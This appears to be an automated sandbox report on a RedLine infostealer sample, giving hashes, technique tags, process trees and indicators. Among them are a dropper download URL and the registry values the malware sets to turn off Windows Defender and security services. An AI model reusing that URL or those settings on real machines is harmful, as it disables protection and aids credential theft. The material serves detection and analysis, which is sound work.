redline | 7bd1800901f644312525102786765942f63e164618b076d1e9c7d77e8c055e19

Analysis

max time kernel
361s
max time network
369s
platform
windows7_x64
resource
win7-en-20210920
submitted
28-10-2021 16:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

hgty.bin.exe
Size

1.6MB
MD5

97b1b0eb2864514c1bd17dc2479fd392
SHA1

1e0db2c33bac2abf8cf5883f779b0fb34e63d7c7
SHA256

7bd1800901f644312525102786765942f63e164618b076d1e9c7d77e8c055e19
SHA512

c1940f8b49298f37e2fe23f2ac1fdb35144f09f77d4d58da96f748c78bac2f56f0b90dc19faf02c1a8d3d9992a1b34bb2d2c7c7ec71eab304151c3c843edbc59

Score

10^/10

redline discovery evasion infostealer persistence ransomware spyware stealer suricata trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://xuiklxus.xyz/hfile.bin

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089

Modifies Windows Defender notification settings 3 TTPs 4 IoCs

evasion trojan

Modify Existing Service

T1031

Modify Registry

T1112

Disabling Security Tools

T1089

Processes:

reg.exereg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1"	reg.exe

Modifies security service 2 TTPs 4 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exereg.exereg.exereg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wscsvc\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wscsvc\Start = "4"	reg.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1436-250-0x00000000000C0000-0x00000000000FC000-memory.dmp	family_redline

suricata: ET MALWARE Likely Evil Macro EXE DL mar 28 2016
suricata: ET MALWARE Likely Evil Macro EXE DL mar 28 2016
suricata
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

7 396 powershell.exe
Downloads MZ/PE file

flow	pid	process
7	396	powershell.exe

Executes dropped EXE 64 IoCs

Processes:

hgty.bin.tmp7za.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exe7za.exeeDbwCBj.exeNemica.exe.com

pid	process
324	hgty.bin.tmp
1740	7za.exe
888	kernel32.exe
1200	kernel32.exe
1056	kernel32.exe
976	kernel32.exe
2004	kernel32.exe
1072	kernel32.exe
1616	kernel32.exe
916	kernel32.exe
1620	kernel32.exe
1056	kernel32.exe
1876	kernel32.exe
884	kernel32.exe
456	kernel32.exe
1120	kernel32.exe
1204	kernel32.exe
1196	kernel32.exe
1692	kernel32.exe
2004	kernel32.exe
856	kernel32.exe
1620	kernel32.exe
1732	kernel32.exe
916	kernel32.exe
1200	kernel32.exe
888	kernel32.exe
396	kernel32.exe
1556	kernel32.exe
328	kernel32.exe
2040	kernel32.exe
1632	kernel32.exe
2004	kernel32.exe
1892	kernel32.exe
1200	kernel32.exe
1752	kernel32.exe
956	kernel32.exe
2016	kernel32.exe
1588	kernel32.exe
560	kernel32.exe
1944	kernel32.exe
1060	kernel32.exe
1056	kernel32.exe
548	kernel32.exe
1296	kernel32.exe
956	kernel32.exe
948	kernel32.exe
364	kernel32.exe
1696	kernel32.exe
908	kernel32.exe
1864	kernel32.exe
784	7za.exe
1632	7za.exe
1288	7za.exe
1096	7za.exe
368	7za.exe
2016	7za.exe
908	7za.exe
880	7za.exe
1828	7za.exe
1812	7za.exe
752	7za.exe
1256	7za.exe
1692	eDbwCBj.exe
1080	Nemica.exe.com

Loads dropped DLL 22 IoCs

Processes:

hgty.bin.exehgty.bin.tmpcmd.execmd.execmd.execmd.exeNemica.exe.comNemica.exe.comRegAsm.exe

pid	process
612	hgty.bin.exe
324	hgty.bin.tmp
1924	cmd.exe
1924	cmd.exe
1180	cmd.exe
888	cmd.exe
888	cmd.exe
888	cmd.exe
888	cmd.exe
888	cmd.exe
888	cmd.exe
888	cmd.exe
888	cmd.exe
888	cmd.exe
888	cmd.exe
888	cmd.exe
888	cmd.exe
888	cmd.exe
1952	cmd.exe
1080	Nemica.exe.com
1168	Nemica.exe.com
1436	RegAsm.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

eDbwCBj.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce	eDbwCBj.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	eDbwCBj.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Suspicious use of SetThreadContext 1 IoCs

Processes:

Nemica.exe.com

description pid process target process

PID 1168 set thread context of 1436 1168 Nemica.exe.com RegAsm.exe
Drops file in Program Files directory 1 IoCs

Processes:

hgty.bin.tmp

description ioc process

File created C:\Program Files (x86)\is-MLSFG.tmp hgty.bin.tmp
Drops file in Windows directory 1 IoCs

Processes:

makecab.exe

description ioc process

File created C:\Windows\Logs\CBS\CbsPersist_20211028163156.cab makecab.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

1884 timeout.exe
1612 timeout.exe
Download via BitsAdmin 1 TTPs 1 IoCs
dropper

BITS Jobs
T1197

Processes:

bitsadmin.exe

pid process

1900 bitsadmin.exe
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

276 vssadmin.exe

description	pid	process	target process
PID 1168 set thread context of 1436	1168	Nemica.exe.com	RegAsm.exe

description	ioc	process
File created	C:\Program Files (x86)\is-MLSFG.tmp	hgty.bin.tmp

description	ioc	process
File created	C:\Windows\Logs\CBS\CbsPersist_20211028163156.cab	makecab.exe

pid	process
1884	timeout.exe
1612	timeout.exe

pid	process
1900	bitsadmin.exe

pid	process
276	vssadmin.exe

Modifies data under HKEY_USERS 48 IoCs

Processes:

kernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	kernel32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	kernel32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	kernel32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	kernel32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	kernel32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	kernel32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	kernel32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	kernel32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	kernel32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	kernel32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	kernel32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	kernel32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	kernel32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	kernel32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	kernel32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	kernel32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	kernel32.exe

Runs ping.exe 1 TTPs 64 IoCs

Remote System Discovery

T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXE

pid	process
1972	PING.EXE
784	PING.EXE
1008	PING.EXE
396	PING.EXE
1556	PING.EXE
1060	PING.EXE
1996	PING.EXE
1296	PING.EXE
1204	PING.EXE
2016	PING.EXE
1612	PING.EXE
1556	PING.EXE
1308	PING.EXE
1620	PING.EXE
1032	PING.EXE
1072	PING.EXE
1692	PING.EXE
1692	PING.EXE
1696	PING.EXE
644	PING.EXE
1164	PING.EXE
1344	PING.EXE
560	PING.EXE
320	PING.EXE
1924	PING.EXE
436	PING.EXE
1476	PING.EXE
1900	PING.EXE
1080	PING.EXE
1464	PING.EXE
344	PING.EXE
2016	PING.EXE
1064	PING.EXE
884	PING.EXE
1076	PING.EXE
1344	PING.EXE
1820	PING.EXE
1288	PING.EXE
1292	PING.EXE
1256	PING.EXE
1256	PING.EXE
1344	PING.EXE
1624	PING.EXE
884	PING.EXE
1900	PING.EXE
1944	PING.EXE
956	PING.EXE
784	PING.EXE
1752	PING.EXE
852	PING.EXE
1744	PING.EXE
1064	PING.EXE
1164	PING.EXE
1864	PING.EXE
1464	PING.EXE
1924	PING.EXE
456	PING.EXE
364	PING.EXE
2004	PING.EXE
984	PING.EXE
1584	PING.EXE
1996	PING.EXE
1204	PING.EXE
1412	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

hgty.bin.tmppowershell.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exe

pid	process
324	hgty.bin.tmp
324	hgty.bin.tmp
396	powershell.exe
888	kernel32.exe
888	kernel32.exe
1056	kernel32.exe
1056	kernel32.exe
1200	kernel32.exe
1200	kernel32.exe
976	kernel32.exe
976	kernel32.exe
2004	kernel32.exe
2004	kernel32.exe
916	kernel32.exe
1620	kernel32.exe
1620	kernel32.exe
916	kernel32.exe
1056	kernel32.exe
1056	kernel32.exe
884	kernel32.exe
884	kernel32.exe
1120	kernel32.exe
1120	kernel32.exe
1204	kernel32.exe
1204	kernel32.exe
1692	kernel32.exe
1692	kernel32.exe
2004	kernel32.exe
2004	kernel32.exe
1620	kernel32.exe
1620	kernel32.exe
1732	kernel32.exe
1732	kernel32.exe
1200	kernel32.exe
1200	kernel32.exe
888	kernel32.exe
888	kernel32.exe
1556	kernel32.exe
1556	kernel32.exe
328	kernel32.exe
328	kernel32.exe
1632	kernel32.exe
2004	kernel32.exe
1632	kernel32.exe
2004	kernel32.exe
1752	kernel32.exe
1752	kernel32.exe
1200	kernel32.exe
1200	kernel32.exe
956	kernel32.exe
956	kernel32.exe
2016	kernel32.exe
2016	kernel32.exe
1944	kernel32.exe
1944	kernel32.exe
1060	kernel32.exe
1060	kernel32.exe
548	kernel32.exe
548	kernel32.exe
1296	kernel32.exe
1296	kernel32.exe
948	kernel32.exe
948	kernel32.exe
364	kernel32.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

464

pid	process
464

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exekernel32.exe

description	pid	process
Token: SeDebugPrivilege	396	powershell.exe
Token: SeDebugPrivilege	888	kernel32.exe
Token: SeAssignPrimaryTokenPrivilege	888	kernel32.exe
Token: SeIncreaseQuotaPrivilege	888	kernel32.exe
Token: 0	888	kernel32.exe
Token: SeDebugPrivilege	1056	kernel32.exe
Token: SeAssignPrimaryTokenPrivilege	1056	kernel32.exe
Token: SeIncreaseQuotaPrivilege	1056	kernel32.exe
Token: 0	1056	kernel32.exe
Token: SeDebugPrivilege	1200	kernel32.exe
Token: SeAssignPrimaryTokenPrivilege	1200	kernel32.exe
Token: SeIncreaseQuotaPrivilege	1200	kernel32.exe
Token: SeDebugPrivilege	976	kernel32.exe
Token: SeAssignPrimaryTokenPrivilege	976	kernel32.exe
Token: SeIncreaseQuotaPrivilege	976	kernel32.exe
Token: SeDebugPrivilege	2004	kernel32.exe
Token: SeAssignPrimaryTokenPrivilege	2004	kernel32.exe
Token: SeIncreaseQuotaPrivilege	2004	kernel32.exe
Token: 0	2004	kernel32.exe
Token: SeDebugPrivilege	916	kernel32.exe
Token: SeDebugPrivilege	1620	kernel32.exe
Token: SeAssignPrimaryTokenPrivilege	1620	kernel32.exe
Token: SeAssignPrimaryTokenPrivilege	916	kernel32.exe
Token: SeIncreaseQuotaPrivilege	916	kernel32.exe
Token: SeIncreaseQuotaPrivilege	1620	kernel32.exe
Token: 0	1620	kernel32.exe
Token: SeDebugPrivilege	1056	kernel32.exe
Token: SeAssignPrimaryTokenPrivilege	1056	kernel32.exe
Token: SeIncreaseQuotaPrivilege	1056	kernel32.exe
Token: SeDebugPrivilege	884	kernel32.exe
Token: SeAssignPrimaryTokenPrivilege	884	kernel32.exe
Token: SeIncreaseQuotaPrivilege	884	kernel32.exe
Token: 0	884	kernel32.exe
Token: SeDebugPrivilege	1120	kernel32.exe
Token: SeAssignPrimaryTokenPrivilege	1120	kernel32.exe
Token: SeIncreaseQuotaPrivilege	1120	kernel32.exe
Token: SeDebugPrivilege	1204	kernel32.exe
Token: SeAssignPrimaryTokenPrivilege	1204	kernel32.exe
Token: SeIncreaseQuotaPrivilege	1204	kernel32.exe
Token: 0	1204	kernel32.exe
Token: SeDebugPrivilege	1692	kernel32.exe
Token: SeAssignPrimaryTokenPrivilege	1692	kernel32.exe
Token: SeIncreaseQuotaPrivilege	1692	kernel32.exe
Token: SeDebugPrivilege	2004	kernel32.exe
Token: SeAssignPrimaryTokenPrivilege	2004	kernel32.exe
Token: SeIncreaseQuotaPrivilege	2004	kernel32.exe
Token: 0	2004	kernel32.exe
Token: SeDebugPrivilege	1620	kernel32.exe
Token: SeAssignPrimaryTokenPrivilege	1620	kernel32.exe
Token: SeIncreaseQuotaPrivilege	1620	kernel32.exe
Token: SeDebugPrivilege	1732	kernel32.exe
Token: SeAssignPrimaryTokenPrivilege	1732	kernel32.exe
Token: SeIncreaseQuotaPrivilege	1732	kernel32.exe
Token: 0	1732	kernel32.exe
Token: SeDebugPrivilege	1200	kernel32.exe
Token: SeAssignPrimaryTokenPrivilege	1200	kernel32.exe
Token: SeIncreaseQuotaPrivilege	1200	kernel32.exe
Token: SeDebugPrivilege	888	kernel32.exe
Token: SeAssignPrimaryTokenPrivilege	888	kernel32.exe
Token: SeIncreaseQuotaPrivilege	888	kernel32.exe
Token: 0	888	kernel32.exe
Token: SeDebugPrivilege	1556	kernel32.exe
Token: SeAssignPrimaryTokenPrivilege	1556	kernel32.exe
Token: SeIncreaseQuotaPrivilege	1556	kernel32.exe

Suspicious use of FindShellTrayWindow 7 IoCs

Processes:

hgty.bin.tmpNemica.exe.comNemica.exe.com

pid process

324 hgty.bin.tmp
1080 Nemica.exe.com
1080 Nemica.exe.com
1080 Nemica.exe.com
1168 Nemica.exe.com
1168 Nemica.exe.com
1168 Nemica.exe.com
Suspicious use of SendNotifyMessage 6 IoCs

Processes:

Nemica.exe.comNemica.exe.com

pid process

1080 Nemica.exe.com
1080 Nemica.exe.com
1080 Nemica.exe.com
1168 Nemica.exe.com
1168 Nemica.exe.com
1168 Nemica.exe.com

pid	process
1080	Nemica.exe.com
1080	Nemica.exe.com
1080	Nemica.exe.com
1168	Nemica.exe.com
1168	Nemica.exe.com
1168	Nemica.exe.com

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

hgty.bin.exehgty.bin.tmpcmd.execmd.exewlanext32.exe

description	pid	process	target process
PID 612 wrote to memory of 324	612	hgty.bin.exe	hgty.bin.tmp
PID 612 wrote to memory of 324	612	hgty.bin.exe	hgty.bin.tmp
PID 612 wrote to memory of 324	612	hgty.bin.exe	hgty.bin.tmp
PID 612 wrote to memory of 324	612	hgty.bin.exe	hgty.bin.tmp
PID 612 wrote to memory of 324	612	hgty.bin.exe	hgty.bin.tmp
PID 612 wrote to memory of 324	612	hgty.bin.exe	hgty.bin.tmp
PID 612 wrote to memory of 324	612	hgty.bin.exe	hgty.bin.tmp
PID 324 wrote to memory of 1828	324	hgty.bin.tmp	cmd.exe
PID 324 wrote to memory of 1828	324	hgty.bin.tmp	cmd.exe
PID 324 wrote to memory of 1828	324	hgty.bin.tmp	cmd.exe
PID 324 wrote to memory of 1828	324	hgty.bin.tmp	cmd.exe
PID 324 wrote to memory of 1924	324	hgty.bin.tmp	cmd.exe
PID 324 wrote to memory of 1924	324	hgty.bin.tmp	cmd.exe
PID 324 wrote to memory of 1924	324	hgty.bin.tmp	cmd.exe
PID 324 wrote to memory of 1924	324	hgty.bin.tmp	cmd.exe
PID 1924 wrote to memory of 396	1924	cmd.exe	powershell.exe
PID 1924 wrote to memory of 396	1924	cmd.exe	powershell.exe
PID 1924 wrote to memory of 396	1924	cmd.exe	powershell.exe
PID 1924 wrote to memory of 396	1924	cmd.exe	powershell.exe
PID 1828 wrote to memory of 1900	1828	cmd.exe	bitsadmin.exe
PID 1828 wrote to memory of 1900	1828	cmd.exe	bitsadmin.exe
PID 1828 wrote to memory of 1900	1828	cmd.exe	bitsadmin.exe
PID 1828 wrote to memory of 1900	1828	cmd.exe	bitsadmin.exe
PID 1828 wrote to memory of 1628	1828	cmd.exe	wlanext32.exe
PID 1828 wrote to memory of 1628	1828	cmd.exe	wlanext32.exe
PID 1828 wrote to memory of 1628	1828	cmd.exe	wlanext32.exe
PID 1828 wrote to memory of 1628	1828	cmd.exe	wlanext32.exe
PID 1828 wrote to memory of 784	1828	cmd.exe	attrib.exe
PID 1828 wrote to memory of 784	1828	cmd.exe	attrib.exe
PID 1828 wrote to memory of 784	1828	cmd.exe	attrib.exe
PID 1828 wrote to memory of 784	1828	cmd.exe	attrib.exe
PID 1628 wrote to memory of 1824	1628	wlanext32.exe	cmd.exe
PID 1628 wrote to memory of 1824	1628	wlanext32.exe	cmd.exe
PID 1628 wrote to memory of 1824	1628	wlanext32.exe	cmd.exe
PID 1828 wrote to memory of 1744	1828	cmd.exe	PING.EXE
PID 1828 wrote to memory of 1744	1828	cmd.exe	PING.EXE
PID 1828 wrote to memory of 1744	1828	cmd.exe	PING.EXE
PID 1828 wrote to memory of 1744	1828	cmd.exe	PING.EXE
PID 1924 wrote to memory of 1740	1924	cmd.exe	7za.exe
PID 1924 wrote to memory of 1740	1924	cmd.exe	7za.exe
PID 1924 wrote to memory of 1740	1924	cmd.exe	7za.exe
PID 1924 wrote to memory of 1740	1924	cmd.exe	7za.exe
PID 1828 wrote to memory of 1476	1828	cmd.exe	PING.EXE
PID 1828 wrote to memory of 1476	1828	cmd.exe	PING.EXE
PID 1828 wrote to memory of 1476	1828	cmd.exe	PING.EXE
PID 1828 wrote to memory of 1476	1828	cmd.exe	PING.EXE
PID 1828 wrote to memory of 1032	1828	cmd.exe	PING.EXE
PID 1828 wrote to memory of 1032	1828	cmd.exe	PING.EXE
PID 1828 wrote to memory of 1032	1828	cmd.exe	PING.EXE
PID 1828 wrote to memory of 1032	1828	cmd.exe	PING.EXE
PID 1924 wrote to memory of 936	1924	cmd.exe	WScript.exe
PID 1924 wrote to memory of 936	1924	cmd.exe	WScript.exe
PID 1924 wrote to memory of 936	1924	cmd.exe	WScript.exe
PID 1924 wrote to memory of 936	1924	cmd.exe	WScript.exe
PID 1924 wrote to memory of 1884	1924	cmd.exe	timeout.exe
PID 1924 wrote to memory of 1884	1924	cmd.exe	timeout.exe
PID 1924 wrote to memory of 1884	1924	cmd.exe	timeout.exe
PID 1924 wrote to memory of 1884	1924	cmd.exe	timeout.exe
PID 1828 wrote to memory of 1592	1828	cmd.exe	PING.EXE
PID 1828 wrote to memory of 1592	1828	cmd.exe	PING.EXE
PID 1828 wrote to memory of 1592	1828	cmd.exe	PING.EXE
PID 1828 wrote to memory of 1592	1828	cmd.exe	PING.EXE
PID 1828 wrote to memory of 1464	1828	cmd.exe	PING.EXE
PID 1828 wrote to memory of 1464	1828	cmd.exe	PING.EXE

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

784 attrib.exe

pid	process
784	attrib.exe

C:\Users\Admin\AppData\Local\Temp\hgty.bin.exe
"C:\Users\Admin\AppData\Local\Temp\hgty.bin.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:612

C:\Users\Admin\AppData\Local\Temp\is-8P2H3.tmp\hgty.bin.tmp
"C:\Users\Admin\AppData\Local\Temp\is-8P2H3.tmp\hgty.bin.tmp" /SL5="$3015A,1023751,780800,C:\Users\Admin\AppData\Local\Temp\hgty.bin.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
